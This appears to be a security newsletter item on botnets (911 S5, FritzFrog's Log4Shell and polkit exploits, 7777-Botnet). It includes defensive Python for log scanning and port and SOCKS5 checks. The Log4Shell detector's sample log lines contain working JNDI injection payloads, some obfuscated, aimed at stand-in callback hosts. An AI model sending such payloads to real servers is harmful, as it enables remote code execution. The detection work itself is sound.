"Largest Botnet Ever" Disrupted. 911 S5's Alleged Mastermind Arrested. I guess he won't be getting much use of that Ferrari and Rolls Royce for a while...
Akamai provided details about a new variant of the FritzFrog botnet, which abuses the 2021 Log4Shell vulnerability CVE-2021-44228 (10.0 critical). Exploitation is brute-force in style: the malware attempts to hit as many vulnerable Java applications as it can reach. The malware now also includes a module that exploits CVE-2021-4034, a privilege escalation in the polkit Linux component, which lets it run as root on vulnerable servers. IOCs provided.
🔗 https://www.akamai.com/blog/security-research/2024/feb/fritzfrog-botnet-new-capabilities-log4shell
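Because the Log4Shell abuse described above is sprayed at any reachable Java application, the most useful defensive check is to scan request logs for the `${jndi:` lookup that triggers CVE-2021-44228, including the case-wrapper and default-value obfuscations attackers use to hide it. The following detector is an added example, not code from Akamai's report or the FritzFrog analysis; the access-log lines, IP addresses and callback hosts in it are constructed for illustration.

```python
import re
from typing import List, Tuple

# Constructed access-log lines (hypothetical; documentation IP ranges, not real IoCs).
SAMPLE_LOGS = [
    '203.0.113.5 - - [01/Feb/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Feb/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [01/Feb/2024:10:00:03 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://198.51.100.7/b}"',
    '203.0.113.12 - - [01/Feb/2024:10:00:04 +0000] "POST /api HTTP/1.1" 500 12 "-" "curl/8.0"',
]

# Log4j lookup wrappers commonly used to disguise the literal string:
#   ${lower:j} -> j, ${upper:N} -> N, ${::-j} -> j, ${env:NOPE:-j} -> j
_CASE_RE = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
_DEFAULT_RE = re.compile(r"\$\{[^{}]*:-([^}]*)\}")
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(s: str) -> str:
    """Collapse nested lower/upper/default-value lookups until nothing changes."""
    prev = None
    while prev != s:
        prev = s
        s = _CASE_RE.sub(lambda m: m.group(1), s)
        s = _DEFAULT_RE.sub(lambda m: m.group(1), s)
    return s


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, client IP, normalized line) for every line carrying a JNDI lookup.

    The raw line is checked as well as the normalized one, so a payload that
    embeds ':-' inside the JNDI URL cannot hide by being collapsed away.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if _JNDI_RE.search(line) or _JNDI_RE.search(norm):
            client_ip = line.split(" ", 1)[0]
            hits.append((n, client_ip, norm))
    return hits


if __name__ == "__main__":
    for n, ip, evidence in scan(SAMPLE_LOGS):
        print(f"line {n}: JNDI lookup from {ip}: {evidence}")
```

The normalizer is deliberately conservative: it only unwraps the three lookup forms listed in the comments, so anything it cannot reduce is still matched on the raw text rather than silently ignored.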
VulnCheck wrote about 7777-Botnet with the following information:
7777-Botnet remains active, and VulnCheck used co-located services to theorize the botnet is infecting TP-Link, Xiongmai, and Hikvision devices using CVE-2017-7577, CVE-2018-10088, CVE-2022-45460, CVE-2021-36260, and/or CVE-2022-24355.
The botnet also appears to infect other systems like MVPower, Zyxel NAS, and GitLab, although at a very low volume.
The botnet doesn’t just start a service on port 7777. It also spins up a SOCKS5 server on port 11228.
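Two listening ports, 7777 and 11228, are the host-level indicators that fall out of the description above, and the second one should speak SOCKS5. The script below, an added example rather than VulnCheck's own tooling, flags those ports in `ss -ltn` output and can confirm a suspect listener with the SOCKS5 method-selection handshake (client greeting `05 01 00`, server reply `05 <method>`). The `ss` output it parses is a constructed sample; `probe_socks5` is a live check intended to be run against hosts you administer.

```python
import re
import socket
from typing import Dict, List, Optional

# Listening ports attributed to 7777-Botnet in the text above.
BOTNET_PORTS = {7777: "7777-Botnet service", 11228: "7777-Botnet SOCKS5 proxy"}

# Constructed `ss -ltn` output for a hypothetical infected host (not a real capture).
SAMPLE_SS = """State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*
LISTEN  0       128     0.0.0.0:7777        0.0.0.0:*
LISTEN  0       128     [::]:11228          [::]:*
LISTEN  0       128     127.0.0.1:3306      0.0.0.0:*
"""

# Matches one LISTEN row and captures local address and port (IPv4, IPv6 or wildcard).
_LISTEN_RE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s", re.MULTILINE)


def flag_listeners(ss_output: str) -> List[Dict[str, object]]:
    """Return every listening socket whose port matches a known 7777-Botnet port."""
    findings = []
    for m in _LISTEN_RE.finditer(ss_output):
        addr, port = m.group(1), int(m.group(2))
        if port in BOTNET_PORTS:
            findings.append({"addr": addr, "port": port, "why": BOTNET_PORTS[port]})
    return findings


# SOCKS5 greeting: version 5, one offered method, method 0x00 (no authentication).
SOCKS5_GREETING = b"\x05\x01\x00"


def parse_socks5_reply(reply: bytes) -> Optional[str]:
    """Classify the 2-byte method-selection reply; None means the peer is not SOCKS5."""
    if len(reply) != 2 or reply[0] != 0x05:
        return None
    names = {0x00: "no-auth", 0x02: "username/password", 0xFF: "no acceptable method"}
    return names.get(reply[1], f"method 0x{reply[1]:02x}")


def probe_socks5(host: str, port: int, timeout: float = 3.0) -> Optional[str]:
    """Live check of a suspect listener: send the greeting and classify the reply."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(SOCKS5_GREETING)
            return parse_socks5_reply(s.recv(2))
    except OSError:
        return None  # refused, timed out or reset: treat as "not confirmed"


if __name__ == "__main__":
    for f in flag_listeners(SAMPLE_SS):
        print(f"{f['addr']}:{f['port']} -> {f['why']}")
    # Example live use against a host you own (hypothetical address):
    # print(probe_socks5("192.0.2.10", 11228))
```

A reply of `05 00` or even `05 ff` confirms a SOCKS5 speaker on 11228; anything else (an HTTP banner, a bare close) means the port is in use by something that merits a closer look but is not the proxy described here.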